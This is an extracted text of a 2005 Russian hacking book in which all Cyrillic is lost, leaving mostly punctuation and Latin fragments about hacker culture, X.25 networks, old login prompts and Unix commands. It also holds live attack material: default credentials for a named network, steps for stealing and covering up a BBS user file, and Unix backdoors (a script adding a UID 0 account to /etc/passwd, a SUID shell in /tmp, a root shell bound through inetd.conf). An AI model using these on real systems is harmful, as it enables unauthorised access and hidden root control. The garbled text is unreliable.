,
2005
004.056 32.973.202
36
.
36 : / . - 3- . - .: , 2005. - 320 .
ISBN 5-9643-0049-9 -
. 2000 . -. ,
, ,
, - .
-
. , ,
.
.
, ,
, .
,
, .
,
, U N I X ftpd ftp, , , ,
Internet, DNS- Internet .
, ,
, ,
,
.
Windows NT, Linux Unix .
, .
, , , , , .
-
,
. ,
.
, ,
. ,
-,
,
.
004.056 32.973.202
., 2005 -, 2005
ISBN 5-9643-0049-9 , 2005
... 3
,
- . :
, . -
.
, .
, - , ,
,
,
(cracker) . .
,
. .
.
... , ,
. - , .
! , , ; . , - . - .
; , .
,
...
, 2 , .
, , .
: , .
: , , , -.
: , , , -, ,
, .
, ,
, : , .
, : ,
, , .
, , .
, : , Windows , c .
: , , . ,
, , ; .
.
. : : ?
: , Windows , c .
: , !
, Windows, , . ,
, ,
; , , .
,
: ? : , . :
? ? : , , , ,
.
: ? : .
: , ,
,
: ,
.
: ,
,
, .
: , ,
; ; ; . ,
.
General protection fault.
1. ?
,
, .
, ,
.
, ,
,
-
ARPAnet. . Internet. Unix , . Usenet. World Wide Web. ,
, , , - .
-. ,
, . ,
.
,
, ,
.
, ,
.
,
, . ( , , ), .
.
, .
, ,
,
.
,
,
.
: , .
, .
, - alt.2600 ,
, , .
- ,
, ,
.
- ,
,
.
, , ,
.
.
, 9 10 , -
,
( exploit). ( 10% ).
- ,
. , -,
, , ,
( ). ,
-
.
,
. ,
,
, : , .
- ( , ) , , . -
. , -,
: rm -f-d *, del *.*, format : /U .., , -, .
, -
.
, (
). ,
, ,
, , .
- (, , ), - ,
,
.
( ). Internet ,
Web-, . -
(, , ..). , , , -
.
- ,
,
- ,
. ,
, ,
: ,
. ,
,
.
, ,
,
. , ,
, . , , -
, .
, , , . ,
, ,
, ,
.
,
, -
,
.
-
, ,
,
: , (registration key) - ..
, ,
. ,
, . ,
,
- - .
- !
. ,
-
,
! , - , -
. ,
-, ,
. , .
,
,
.
,
, ,
. . ,
, ,
.. . . .
, ,
.
!
32- ,
, 70- , . .
,
. .
,
-.
; .
,
. , ,
, .
-,
.
( ) $10 . , .
, ,
, . , ,
. ; -
, -
, , ! 8 ,
. ,
,
.
, ,
,
.
,
. ? , ! , ,
. , ,
,
. , ,
?!
, ,
. 90- , , ,
( ) !
.
,
. ,
, ,
, .
( !). , , -
.
; , , , !
. . .
,
70- . ,
.
2.
,
. ,
, ,
. , ,
, .
, .
, , - ,
.
, -
, ,
.
,
, :
,
.
- ,
, .
. -
,
, .
, ,
, ,
.
,
, , .
,
, , .
-
. , , ,
, ,
, ,
- , .
.
- .
,
.
, ,
- , ,
.
, ,
,
.
,
, , , -
.
, ,
.
, ,
, , , .
- .
( ) ,
, ,
, , - .
. -
, .
, ,
,
, , ( ).
,
,
.
,
. ,
.
- .
-. ,
,
, . ,
, -
, .
, ,
.
, .
, .
- ,
, ,
. , -
.
.
, , .
, ,
, ,
.
.
.
, ,
. , ,
, -
-. , , ,
, .
, .
, ,
,
. ,
. -
, ,
.
,
, .
, .
, .
3.
- , -
. , -
, ,
.
,
. ,
, , ,
HTML. :
.
, , .
,
Python. , . ,
, . ,
.
,
( ), .
, .
, ,
,
, . ,
.
,
, Unix ( , ). - Perl LISP. Perl : web- , Perl, . LISP , , .
,
LISP.
, , (Python, , Perl, LISP). , , ,
.
, , - .
, (, , - ). , .
-
. -
- , ; , ; , ... ,
.
,
,
.
: , ( ) . ...
Unix , .
,
. ,
, - Linux BSD-Unix, .
, , Unix. -
. ,
DOS, Windows MacOS - , .
, Unix - Internet. Internet Unix, Internet-, Unix. Unix-. ( , , Unix Internet , Microsoft , .)
Unix, Linux, ( -, Linux, DOS/
Windows ). . . . Internet. . .
( , Lisp Perl), Microsoft . , ,
,
-.
World Wide Web HTML.
, ,
, ,
- --
. WWW - , - , .
( ) Web.
,
( ), HTML, Web. , HTML , - .
.
, . Web - . - ,
. , ,
.
, -
. / .
4.
, -
. ,
, - ,
( ) .
, ,
,
( , ). -, ( , ), , -
.
, - ,
. ,
, , , ,
, . ,
. , ,
.
, ,
:
.
( ) - , ,
.
-
(free software), , ,
-.
, open-source software.
- ,
,
, ,
.
.
,
.
.
, - (, , ,
) .
.
,
, , -.
,
.
, .
.
-
Web- (FAQ, ) .
,
.
.
( Internet, ) . , , ,
: , ,
, RFC .
, , ,
,
, .
.
.
, (, ). ,
.
,
, , .
,
.
: ,
. ,
, ,
,
.
5.
, ,
. , , ,
.
,
.
-
.
,
- , . .
-.
, ,
.
,
, , . ,
. - , ,
.
6.
, ,
. , ,
. ( ), , , -
.
.
( --).
- / . ( , , ).
.
.
- .
.
. (, .)
,
, .
- ,
,
( ,
). , , , .
.
Usenet ( - ).
-
, .
,
.
, ,
, - . ,
, .
7.
.
.
60- , , . , ,
,
.
.
...
. -,
, Analog, Scientific American Smithsonian, - .
,
,
.
, ,
, .
- - ,
. ,
. - -
.
, .
-
,
,
. , ,
,
.
, ,
.
-
.
.
, ,,
, .
,
,
.
,
,
,
. , ,
, , .
,
,
,
.
...
16 22 , ,
. , ,
,
, .
: - , , , ,
,
- .
- , ,
.
- .
, - ,
,
, , .
shareware freeware, PGP (Pretty Good Privacy) - , SATAN ( ) - , ,
-
, .
Internet - .
, ,
.
, , -
,
, ,
, .
,
.
,
. ,
70- .
.
- ,
,
. ,
-1.
, , ,
, .
. 80-
, IBM. , (Electronic Frontier Foundation), - - Lotus 1-2-3,
.
, ,
, Internet - 50 . , Internet, , , - ..
,
- .
BBS (Bulletin Board System - ), USENET, 80- ( User's Network - ) - .
: . USENET - ,
,
.
.
-
Internet, .
8. ?
.
. ,
, , .
. ,
.
.
.
.
Internet. . .
Internet.
. ,
-
-
, , ,
Web- .
, HackZone - . ,
,
,
.
,
,
. - : -,
Windows NT, , Pepsi-Cola... , , .
-
.
. ,
.
- xpress.ru , D2MAC. D2MAC - , - .
,
, -...
, -
, -
Internet, , . ,
Internete, ! , D2MAC , ,
, .
Windows NT , , , ,
. NT Security, ,
Windows NT - ,
. ,
, ,
Windows NT ,
, NT Security , .
Windows NT -
, .
: , ,
-,
,
. ,
, ,
- ,
.
Happy Hackers Guide - - .
Internet ,
.
,
,
.
, ,
: Internet-, , .
,
.
hacked.net ,
. : , ,
.
.
- , , 2600.. , ,
,
.
10 , - 1984 ( , , ). 1987 1995-. .
, , ,
-
.
-
.
-
-, , .
,
-
,
!
LOpht ( ) Heavy Industries - , ,
2600. - LOpht Crack 2.0, , Windows NT.
,
,
, Mondo 2000. , -
. ,
- , - -
. , , ,
: ,
LOpht . , -
.
Nomad Mobile Research Centre - -
: Windows NT, , , .
,
Novell. Compute .
? -,
, .
,
Internet , -
. ,
, .
,
, , , - .
9. -
,
, .
, , ,
, .
.
,
. ,
.
, ,
.
(
, ,
). ,
.
,
; , ,
!
,
,
-.
, ( ) , .
; . , . ,
, .
, ,
,
, , , .
.
,
.
,
-Z -S. Internet, .
Internet , . , , -
,
.
, . ...
!
Internet Intranet
1. ,
Internet - , ,
: . Internet TCP/IP, :
IP (Internet Protocol) - ,
;
UDP (User Datagram Protocol) - ,
IP ;
TCP (Transmission Control Protocol) - ,
IP .
, Internet, IP-.
Internet- : . ,
; (routing). . , IP- ( ), , 194.85.31.20.
2. (DNS)
DNS (Domain Name System) - ,, ,
Internet. ,
, IP- . ,
. ,
- IP- .
DNS , , .
, ( ). .
, , , :
.gov - ;
.mil - ; - ;
.net - ;
.org - ;
.edu - . ,
, ISO. : www.spm.ru - ;
www.berlin.de - ; www.hotex.nl - .
3. Internet
Internet ., :
ping - .
traceroute - ( Windows 95 Windows NT - tracert.exe).
nslookup - DNS-.
telnet - (23 ) .
ftp - FTP (File Transfer Protocol) (21 ).
finger - , - .
WWW (World Wide Web) Netscape Navigator, Internet Explorer . (80 ) HTTP.
: ftp, telnet, finger www , , ,
-.
4. Internet
, ,
.
, ,
Internet, , . , .
Internet . :
- ( , ) Internet, ( ) .
Internet, - ,
.
(?! Internet?! WWW-cepeepa ?! ?! ! Internet!)
- ,
, Internet.
,
.
- .
,
Internet, .
:
, ,
, .
- :
Internet ( ). ,
,
, .. ,
Internet.
,
Internet , ,
.25 ( SPRINT).
5.
.25 (), . ,
, .. ,
, .
,
-.
, . -
.
(),
.
INUA (Network Users Address/ ) , .
INUI (Network User Identificator/
) .
.
DNIC (Data Network Identification Code/ ) 4 ,
.
PAD (Packet Assemble Disassembler// ) ,
, ..
, .
.25 .25 (
Telemate Telix). , ,
,
.
,
, .
,
. ,
, .. _
. , ,
-
,
.
: . ,
. ,
.
.
, -
, CTRL-P. :
CON - .25; LOC - ; CLR - ; PAR? - .; SET - .; SET? - .
;
PROF - .;
INT - ;
RESET - ; STATUS - .
:
- ;
ERR - ;
RESET - ; FREE - STATUS
;
ENGAGED - STATUS ;
CLRCONF - ;
CLR - :
DTE DTE ;
1 ;
3 INV - ;
5 NC - ; 9 DER - ; 11 NS - ; 13 NP - ;
17 RPE - ;
19 ERR - ; 21 PAD - ;
25 NRC - ; 33 INC - ;
41 NFC - ;
128 DTE - ;
129 DTE - DTE ; 130 DTE - ; 131 DTE - DTE .28;
132 DTE - DTE ; 133 DTE - DTE ;
134 DTE - ; 135 DTE - ; 136 DTE - .25; 137 DTE - DTE ;
138 DTE - .
1.
-
.
, .
. ? . ,
, .
,
, .
.
!
2.
,
. , , .
, ,
.
, .
, ,
, , -
, ,
- .
,
.
,
.
, :
1. , , .
2. .,
FDM, , !
3. , :
) ; ) ; )
MA BELL.
! - ,
. , ,
.
,
, ,
( ). , (.. ) .
4. .
5. - , , .
, , ,
, ,
, .
3.
. ,
.
,
, .
, .
, ,
- .
.
,
90VnpH20-30Hz
30-50V
600V. ! MOV. .
. ,
, ,
, , .
4.
.
. ,
33 , .
,
. , ,
, .
, , ,
... -
. ,
! - ,
.
5. FI
,
, - .
.
.
RFI ,
.
,
. , , ,
!
6. ESS
- Electronic Standardized Switching ( ESS), . ? ,
. ! - . , , ,
.
55 . , ! , -
. ! ESS . ,
, . , , ESS , .
! !
1. !
,
, .
, ,
: , ,
, .
,
.
,
.
2.
, . 50- (MIT) .
. , ,
. -
,
. ,
, ,
,
.
.
,
( , ..)
,
( ,
ID , ) ,
.
.
, ,
,
,
.
-
.
: , ,
, .
3.
-
Telenet. ? -, , . -,
. -,
Telenet, . ,
. - ,
, ,
.
, ,
.
Telenet , , , Telenet Tymnet, ItaPAC, Janet, DATAPAC, SBDN, PandaNet, THENET .
, , -
. , :
=
- type . vt100 , . ,
-.
@. :
@ mail . phones
. ,
phones. , - . , dialup. local dialup,
=
@. , Telenet PAD. PAD / ( ), Public Access Device ( ). .
Telenet , , PAD, , 128 (, ) 9600 19 200 PAD, ,
. PAD , ,
. .
PAD , .
PAD? , ,
(NUA) , .
,
refused collect connections , ,
@ prompt.
, - Refused Collect. - ID (NUI). N U I - /pw , Telenet.
,
PAD - Netlink . Telenet N U A ( ) , ( 713 , .) , , , - ( 914), :
@> 914 001
,
914 002. , - .
.
(914 2354), (422 121 = 422 121.01). , , .
. , 512 , 512 00000.00 512 00000.99, 1 512 00001.00 512 00001.99. !
, .
.
, ,
@ prompt
D .
Outdials , N U A
.
- outdial. Outdial - , telenet - PC, , .
,
Hayes 1200 outdial, Detroit, MI
VEN-TEL 212 Modem ,
Session 1234 established on Modem 5588 ,
H Help - , .
-
- , outdial diverter, . .
, outdial, - , . ,
, - (Redial last number). , . ,
. - -
. VENTEL- D, , .
, , X. 25 Communication PAD, , @. PAD, , , , ,
PAD, , .
PAD PAD, , . ,
Telenet, 212 44 Connected
212. , 44 PAD 212 . 21244 .
PAD, , , .
.
4.
, ,
. ,
, : ?
, ,
- .
,
, ,
.
VMS VAX- Digital Equipment Corporation (DEC)
VMS ( ) . VMS : USENAME
,
,
.
.
- ,
,
. VAX . HELP .
DEC-10 DEC-10 - DEC,
TOPS-10 . ..
DEC-10/20 , - .
[, ], - .
.systat ( ).
[234,1001] BOB JONES, JONES . , :
. login xxx,yyy , , .
.
, UIC, (UIC = ) .
UNIX ,
UNIX.
,
, .
UNIX login: . UNIX
( ), , .
Prime Prime, ,
Primos. Primecon 18.23.05 - ,
. . ,
,
login
18.00.00 Primos, ^ . , 19 +. Primos . Prime Telenet - NETLINK. - , NETLINK, . N U A ' , nc.
, NUA 026245890040004,
@nc:26245890040004 netlink.
-
Hewlett-Packard. :. HEWLETT-PACKARD - :
HELLO SESSION NAME, USERNAME, ACC0UNTNAME, GROUP
,
. -
, - ,
,
. , ,
, .
- ,
:, , .
IRIS IRIS Interactive Real Time Information System (
). PDP-1 l'S, - -.
Welcome to IRIS R9.1.4 Timesharing
ACCOUNT ID? Iris
.
VM/CMS VM/CMS - , IBM (Interna
tional Business Machines). , ,
VM/370 ONLINE ., Tops-10. ,
:
LOGON .
NOS NOS Networking operation system
Cyber, Control Data Corporation. NOS ,
WELCOME TO THE NOS SOFTWARE SYSTEM. COPYRIGHT CONTROL DATA 1978,1987
, ,
FAMILY:
return. user name:
- 7 - . , 7-DOC.
Decserver , , , ,
, ..
Decserver : Enter Username>
. - .
, - .
Local>
.
sh servises
sh nodes - ,
help. modem, dial, - , !
GS/1 GS/1 - . Decserver,
, GS/1 . :
GS/1 > .
GS/1, :
( , , , ..), , GS/1. , Decserver, :
< systemname > , , :
sh n
sh - ,
. ,
, .
5.
. -
: ,
.
, .
() .
ToneLoc v1.10 . - -
. , ,
, ?
Cracker Jack v1.4 . ,
.
Hacker's Utility V1.02 .
:
port scanner
finger lookup file extractor !
CyberKit v. 2.4 :
Trace Route
WhoIs Finger
Name Server Look Up Time Synchronizer
Quote of the Day . PGP Freeware v5.0
.
? ? , ! , . , ,
!
7th Sphere PortScan v1.1 7th Sphere.
.
:
1. , . . -
, - , .
,
, .
!
2. , , - (C++, Perl, JavaScript ).
Unix, TCP/IP . , ...
6 ( ).
1. , ( ), . ,
.
, ,
, ; , . ,
,
. , ,
, , .., , ,
, , .
2. 20:00 ( !) 00:00 . , , . ! , , . 00:00 , , 00:00 .
- . ,
( 00:00-03:00). - ,
, , -
.
3. , - , ( ) /, , ,
. , , /r, , . -
...
4. , - ..
GO ADMINi
, , -
( ). .
5. ,
. .
6. , - , n' ( -) . - / , .
7. -, , - ( ). / ?.
-
. ,
, -
. .
.
. . ,
, , ? , ,
,
.
, , -
.
,
. , ,
.
,
.
Display ANSI graphics ([Y]/N)? > [...- ( ). . . ] UserID : Password:
ENTER YOUR NAME = > PASSWORD = > LANGUAGE = >
REX400 Logical Channel: 0 REX400 v4.54.02, Copyright (C) 1992-1996, Club400 Ltd.
M) Mail H) Help G) Gateway Q) Quit Multi Host>
CISCO- User Access Verification Password: ,
, :
(UserID/Password):
, :
Demo1/Demo1 ..,
. .
( ) .
- , :
UUCP/UUCP ,
.
UUCP/PCUU , .
UUCP/UUAOMIN
, .
, , , - .
, :
, -
. - .
ID ,
.
. , -
.
.
, :
reg
registry
onboardl onboard - .
, MAIN (GO MAIN TREE, TYPE LIB TYPE LIBS TYPE LIB-TREE.
1 - .
, 6100255 , ,
,
, .
, ID . , ,
, ,
ID. , ID . ID , , / /, 10-15 ID. (/ ). . -
.
,
- .
:
1 - ( ). 2 - ( ). 3 - (
.
, ,
, .
.
,
:
,
.
.
.
8 .
.
, .
, ,
, .
( Demo Demo). , Demo/Demo, .
( - ): ! , ,
,
.
206-85-70 924-74-85
ID Password. ( ). !
, , -
.
.
, ( ) ID , ID. .
:
/ / / / Ukrpack / / (0482) 33-31-78/ /. :
Ukrpack/Ukrpack
Ukrpack/Kcaprku -
Ukrpack/ Andrew -
Ukrpack/Andy-
Ukrpack/Andrey- Ukrpack/Fylhtq - (
) ' Ukrpack/Kfpfhtd - (
) Ukrpack/Vbffqkjdbx- (
) Ukrpack/Lam -
Ukrpack/Aml -
Ukrpack/Mal -
Ukrpack/Lma -
Ukrpack/333178 -
Ukrpack/Telnet -
Ukrpack/Ntkytn - ( )
Ukrpack/Odessa - (, )
Ukrpack/Jltccf- ( )
, -
- .
-
,
.
() . ,
:
X = S
X - , S - , , - . ,
,
, ( ). , ,
( qwerty secret), -, - ( ) . : - . /U
:
.
.
Capture. :
/ /
/ , - -
ID , '.
.
< / ? / ?.
. ,
.
:
- , ..
,
, , .
!
- , -
.
. ,
, - - .
N (.. ') . , N , . ,
, , ,
Z ( --).
:
, , .. ,
...
USRACC.DAT ,
dat\usracc.dat , , , ,
.
, (, , ) , , . ,
30 000 (, ).
usracc.dat, .
1 usracc.dat,
( usracc.dat ).
,
useracc.dat . ( !) , . 6100255 .
2 ,
. ? , ?; ml, . :
1. , : , , :
ml /d /d , dos-.
:
:\> cd dir
( \remart \remart.40, ).
,
()
, d:, .
.
i: ,
, d, e, f, g, h, i, ...
2. , usracc.dat dat. He type - - , - ,
.
3. remart.bat . ,
.
, .
pause - , , ,
pause, , .
remart.bat cleanup.bat, .
remart.bat . cleanup.bat - !
remart.bat - DOS batch file missing, .
4. cleanup.bat type cleanup.bat .
del cleanup.bat -
type cleanup.bat , ; ( )
:
C:\REMART.40\DAT\USRACC.DAT :\ remart.40 ,
,
.
5. . , , , .
hangup, , ,
-
, .
, ( ), cleanup .
6. , remart.bat , cleanup.bat ( ) .
, .
( ). 7. . ,
usracc.dat, , del ( !..) . cleanup.bat.
8. rl _ 9. -...
,
.
,
(!) . admin/admin, , ,
adminoM. .
:
1 - . : Display ANSI
Graphics ([Y]/N)? >, @. . :
Login: Password: ,
Enter. (10-20 .) . , ,
.
@ - . , (5-6 .).
2 - .
. / ( ) -
, Enter ! ,
( ). . ,
, .
- .
3 - . ,
.
(, dir). . 4
- .
. - : /
,
:
/off , :
...
, , 6100255 .
, , Enter - , ( , ) . - /, / ..
,
, go chattop, - () / 1. -
,
, / 1, , . ,
, /, F+++ - , .
:
1. PROTECT ( ) - , , -
.
2. , SQRT ( Security), , , Alt+251 (v), . Demo - , . ? v , : SQRT ( , , Eclipse protection mode - 80286 -
). - - remstart.com , RE-MARTL.EXE , , .
Unix
1.
UNIX, , AT&T - 60- . , UNIX, , , , , , UNIX . ,
. , ,
, .
, - IBM , ? , UNIX . , ,
UNIX ( UNIX, , ). AT&T UNIX, - (AT&T 6300). Sun SunOS, UNIX, VAX- Ultrix, VAX- UNIX. : , (BSD, UNIX, SunOS, Ultrix, Xenix ..), , .
, , ,
. -
, UNIX ,, , , , ,
. , ,
UNIX VAX , - IBM-. , , ,
, VAX, VMS.
2. Unix
UNIX UNIX, - UNIX, , , ( Unix System V
BSD, SunOS, Ultrix, Xenix ..), .
, unix . , UNIX , , :
Login:
. , , , Unix, BBS, login- OS ( ) , Unix. (Xa!) Unix'bi Login: :
Welcome to SHUnix. Please log in.
( SHUNIX. ) Login:
- . Unix'bi (, BBS ) , , - . , Unix'ax , ,
UUCP/USENET/BITNET .
. (login)! (account). 8 . , ,
. ,
UNIX . , : .
.
:
ACCOUNT root sys biu mountfsys adm uucp nuucp anou
root - ( ) sys / system / bin sys / bin mountfsys adm uucp anon
anon
user
games install reboot demo umountfsys sync admiu guest daemou
user games install * ni. ie?a demo umountfsys sync admin guest daemon
root, mountfsys, umountfsys, install , , sync - . ,
.
, ,
/, . REBOOT , , -
. , ,
, - . ,
, UNISYS, HP/UX (Hewlett Packard Unixes). , .
, ,
(reboot), , .
BSD MIT ( ). :
rwho - ,
finger - w h o -
,
.
/ , , . login incorrect.
, ,
, ,
.
, . ,
, ,
.
- Cannot change to home directory Cannot Change Directory. home directory, , , . :\ :\, -, - /homedirectory. (: / ( ), \ ( )). , ,
['/']. No Shell. ,
shell, . .
, ,
() , Using the bourne shell Using sh.
.
,
.
, , : .
.
.
. .
UID ( ) . UID 0 ().
UID = 0 . (), . , DID = 50, - UID 50, , , .
4.
- ,
,
. ,
passwd. . . ,
, - ( ). - , -MAND.COM MS DOS, ( ). , ,
. , :
sh - , COMMAND.COM Unix. , Unix.
csh - , - .
ksh - korn. .
tcsh - , MIT. .
vsh - , . ... Windows DOS. rsh - restricted () remote () .
, ,
, Unix Unix, . , , ,
, .
Eskimo North, Unix . Esh, BBS, , , .
, -
.
, BBS.
,
:
$ ,
:
#
PS1 . , PS1 HI:, :
HI:
5.
Control-D .
, .
control-d, , .
Control-J .
@ .,
? wildcard (). .
, , b?b, Unix bob, bib, bub, / a-z, 0-9.
. *,
hit, him, hiiii, hiya , hi. H*l hill, hull, hi , h 1.
. b[o,u,i]b, : bib, bub, bob. b[a-d]b, : bab, bbb, bcb, bdb. [], ? *
.
Unix . , Hill hill - . , Hill, hill, hill, hili . , [], , . ..
6.
Unix. ,
.
ls .
, ,
ls .
:
$ ls hithere runme note.text src
$ ls -l : $ ls -l rwx--x--x sirhack sirh 10990 runme ...
:
rwx-x-x - .
sirhack sirh - , , sirhack = , sirh = , .
10990 - . runme - .
cat . .
. :
$ cat note.txt !
$ cd (). : cd
/dir/dirl/dir2/dirn. did/... - . , :
$ cd / ., *
$ ls bin sys etc temp work us , , , -
$ cd /usr $ ls sirhack datawiz prophet:
violence par phiber scythian $ cd /usr/sirhack $ ls hithere runme
note.text src
$
, .
(), (, src), cd src [ /]. cd /usr/sirhack/src sirhack dir cd src.
.
: _ _
$ runme runme2 $ ls hithere runme note.text src runme2 , .
$ runme /usr/datwiz/runme
mv
.
: mv _ _
$ mv runme2 runit $ ls hithere runme note.text src runit :
$ mv runit /usr/datwiz/run $ ls hithere runme note.text src $ ls /usr/datwiz runme run
pwd
$ pwd /usr/sirhack $ cd src $ pwd /usr/sirhack/src $ cd .. $ pwd /usr/sirhack (.... ) $ cd . . /datwiz ( cd/usr/datwiz) $ pwd /usr/datwiz $ cd $home ( home) $ pwd /usr/sirhack
rm .
: _ rm - _
$ rm note.text $ ls hithere runme src $ write . ,
.
: write _* $ write scythian scythian has been notified (scythian ) Scy! ?? Message from scythian on tty001 at 17:32 ! : ? scy: .
: .
scy: ok : control-D [ ] $ who (w, who, whodo) , :
$ who login term logontirae scythian + tty001 17:20 phiberO + tty002 15:50 sirhack + ttyOOS 17:21 datawiz - tty004 11:20 glitch - tty666 66:60 $ who . + ,
write , - - .
man .
: man _. . , who, :
$ man who WH0O) xxx .
stty . man stty,
stty, , . : $ stty -parenb ,8,1. Unixno
,7,1.
sz, rz / zmodem.
, S X / xmodem.
rb, sb / batch () ymodem.. 6 Unix , .,
umodem / send/receive via umodem. $ sz filename ready to send... ( ... ) $ rz filename please send your file... (, . . . ) ...etc... ( ..)
ed .
: ed_.
ed _ $ ed newtext
*
1 2 [control-z] * 1 [ 1] 1 * [ ] 3 [control-z] [ 0]
[control-z] 1,41
1 2 3 * w 71 * q $
:
*
*
71 - .
-
1 -
# -
w -
1 ftiame - fname
s fname - fname
w -
q -
mesg / (write)
( ). : mesg () mesg n ().
.
chmod . , .
: chmod mode filename (chmod _) $ chmod a+r newtext newtext:
- all () - read ().
chown .
: chown filename $ chown scythian newtext
chgrp .
: chgrp group file $ chgrp root runme $ finger .
: finger _
.
: grep file $ 1 newtext 1 $ newtext
$ " line 1" newtext $
mail . ,
. , , ELM, MUSH MSH, mail. :
mailusername@address
mail username
mail addrl!addr2!addr3!user mail username@address -
- . UNIX, DOS- VAX- Unix Mail. mail user@address; , .
.
:
mail phibereoptik
:
mail sysl! unisys! pacbell! sbell! scKatt. com! sirhacksys! optik!phiber . .,
, ,
. ,
phiber. , : $ mail sys!uni S ys!pacbel l !sbel l !sc1!att .com!sirhacksys! optik!phiber . ? , . , ? (contrc-1-D) $ , 20
, ,
, :
From optik! sirhacksys! att. com! s d ! sbell! pacbell! unisys! sys!sirhack
mail username, username - .
control-D.
mail. To : $ mail : scythian : sirhack : W e l l . . . . , ! ? .
mail .
- . :
d -
f username - username
wfname - fname
s fname - fname
q - / mail
- ,
m username - username
-
4 [enter] - + -
-
h - .
. ,
.
- ,
,
- .
UUCP. UUCP - UUCP, .
ps . ,
.
(PID), , -
. ps . , sirhack, csh, watch scythian. watch , - ,
:
$ ps .PID TTY NAME 122 001 ksh 123 001 watch $ PS, .
TTY tty ( /),
process. , (!) . ps -f , watch , , watch scythian.
kill . ,
.
, (, ), EUID , , . ( EUID ). , . ,
- , - ..
, kill 122, . kill UNIX . kill pid, UNIX , , . ,
! kill -numpid (num - ). Kill -9 pid - . $ kill 122 $ kill 123 $ ps PID TTY NAME 122 001 ksh 123 001 watch $ kill -9 123 [123]-.killed $ kill -9 122 garbage NO CARRIER
kill -1 0, . .
7.
-
, sh, ksh, csh . .bat MS-DOS, . .
. , ,
- , .
number=1 number 1. string=Hi There
string="Hi There" string Hi
there.
- .
,
($). . ,
bat-, . , . :
counter=1 arg1="-uf" arg2="scythian" ps $arg1 $arg2 echo $counter ps -uf scythian,
1. Echo , .
:
read - .
: read . ! - , :
echo " ?" read hisname echo Hello $hisname ? Sir Hackalot Sir Hackalot : read .
trap - (Ctrl-c). :
trap command; command; command; .. :
trap "echo '!! ' ; echo ! ' , control-c ,
:
!! !
exit : exit []. ,
, .
CASE case .
:
case in 1) command; command;; 2) command; command; command;; *) command;; esac
.
;;>. :
echo ":" echo "(D)irectory (L)ogoff (S)hell" read choice case $choice in D) echo " ..."; ls -al ;; L) echo ; kill -1 0;; S) exit;; *) echo "! ";; esac
esac case.
.
8.
, . : for repeat.
repeat :
repeat 12
. :
repeat scythian sirhack prophet
scythian, sirhack, prophet.
for
for -
do ()
done () :
for counter in 1 2 3 do echo $counter done 1, 2, 3.
9. TEST
: Test
::
-eq = () - ( )
-gt > () -lt < () -ge >= ( )
-1
expr 22+12
22+12 :
expr 22 + 12 :
34
11.
, ,
.profile.
home () .
PS1 , .
$. BSD &.
PATH .
, , ,
. MS-DOS, . ,
,
, ,
, . - ,
.
:
:/bin:/etc:/usr/lbin:$0: , Unix
/bin, /etc, /usr, /lbin , , .
, .
sh sh, , Unix /bin. . -
, , ,
.
TERM .
CURSES, - , esc-. - ,
- .
esc- TERMCAP. , ami vtlOO, CURSES , .
12.
. ? , .
, .
.
..
..
,
, ,
, .
makefile, make , -
.
make , ,
.
:
$ login.& [1234] $ (1234 - , .)
13.
Unix. , Unix,
.
.
,
, MS-DOS , , AmigaDos. ((d) ):
/ ( ) I
I I bin (d) usr (d)
.
sirhack(d) scythian (d) prophet (d) I
src (d) , :
/ /bin /usr /usr/sirhack /usr/sirhack/src /usr/scythian /usr/prophet , .
14.
, - .
. , ,
.
,
. .
( ) id , .
.
, / . , Unix, , UID , .
. .
(owner). , , - .
, , CHOWN, , .
, - ,
, . ,
, chgrp.
. ,
. , ,
, .
, , ,
, , - ,
. ,
, .
. , . - -
.
, .
. - . :
$ ls -l runme r-xrwxr- sirhack root 10990 March 21 runme root , .
sirhack - . root , ,
. , Scythian, root. ,
. datawiz, .
, , ? . - . ,
,
, , .
,
r-x-rwxr--
(-). (-) ,
.
r-xRWXr-(, ) ,
, .
r-xrwxR-- . ,
.
:
$ ls -l drwxr-xr-x sirhack root 342 March 11 src d . ,
(sirhack) , .
, .,
,
:
$ chmod go-r $ ls -l drwx--x--x sirhack root 342 March 11 src -, sirhack,
.
Is, src, , , cannot read directory ( ). - , ,
- .
- ,
.
UNIX
1. !
,
, ,
,
,
...
!
2.
- UNIX. , ID.
ID.
. ? , GANDALF data switch .
.
(8N1 71), GANDALF UNIX. . - ,
, .
, .
,
, . LOG OFF, . , , , ,
. SU () , (, , WHO).
3.
. UNIX .
,
. (, UNIX ) VI.LOGIN.
VI.LOGIN : VI.LOGIN logout , VI.LOGIN
. :
,
.
:
,
.
(ROOT - ).
4.
. ( )
, UNIX. -
. , .
, ,
(, 3-4) . ID , , ,
, - . ,
UNIX, . ! , ! , -
. , -
, , ,
? , ,
,
, , .
, !
PASSWRDS, (SU) !
. UNIX , , .
. .
. , .
, , , NIS, NFS, , SUID, Sendmail . . ! ? #? -!
, ,
root. ? ,
?
5. root
, ,
, .
: . ( , ,
UNIX ). passwrd (
7 , , ..). vi. , UNIX . Vi . -
(dial-up\telnet\rlogin\whatver), , .
,
.
.
, , , ,
, ,
- .
:
,
.
:
(1) UID 0 . ,
, .
, -
.
.
...
#!/bin/csh # Inserts a UID 0 account into the middle of the passwd file. ft There is likely a way to do this in 1/2 a line of AWK or SED. Oh well. # [email protected] set l i n e c o u n t = 'wo -1 /etc/passwd' cd # Do this at home. cp /etc/passwd ./temppass # Safety first. echo passwd file has $ l i n e c o u n t [ 1 ] lines. @ l i n e c o u n t [ 1 ] /= 2 linecount[1] += 1 ft we only want 2 temp files echo Creating two files, $linecount[1] lines each \(or approximately that\). split -$linecount[1] . / temppass ft passwd string optional echo EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" ,/xaa cat ./xab . /xaa mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand rm ./xa ./temppass echo Done... . , ,
.
(2)
, Sync. , , , , .
UID 0 ( * ).
(3) /tmp: #!/bin/sh # Everyone'sfavorite... cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that... chmod 4755 /tmp/.evilnaughtyshell \tmp .
.
,
SUID. , , ... ,
.
, .
(4)
,
?
: Internet- (\etc\ inetd\) TCP UDP .
\etc\inetd.conf. .
:
( D (2) (3) (4) (5) (6) (7) ftp stream tcp nowait root /usr/etc/ftpd ftpd talk dgram udp wait root /usr/etc/ntalkd ntalkd
(1) - , \etc\services. inetd
\etc\services .
, . TCP stream (- ), UDP - dgrams (, ). - (TCP UDP). . wait ,
, , nowait, ,
. - ( UID), . (6) - , (7) ( ). ( ) . internal (6) (7). , , ,
, SUID, , \etc\passwd .
:
\etc\inted.conf, , , .
:
daytime stream top nowait root internal :
daytime stream tcp nowait /bin/sh sh -i \etc\inetd\
. , .
(kill -9, /usr/sbin/inetd /usr/etc/inetd), ( ).
(5)
,
.
.
,
\etc\services, \etc\inetd.conf.
